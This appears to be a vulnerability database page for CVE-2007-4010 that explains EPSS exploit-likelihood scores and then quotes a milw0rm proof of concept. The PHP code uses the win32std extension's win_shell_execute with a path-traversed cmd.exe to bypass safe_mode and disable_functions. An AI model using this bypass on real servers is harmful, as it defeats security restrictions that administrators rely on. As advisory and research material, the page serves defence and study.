CVE-2007-4010 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<?php //PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass //author: shinnai //mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //Tested on xp Pro sp2 full patched, worked both from the cli and on apache //Thanks to rgod for all his precious advises :) //I set php.ini in this way: //safe_mode = On //disable_functions = system //if you launch the exploit from the cli, cmd.exe will be wxecuted //if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd.exe"); //just to be sure that protections work well win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); ?> # milw0rm.com [2007-07-24]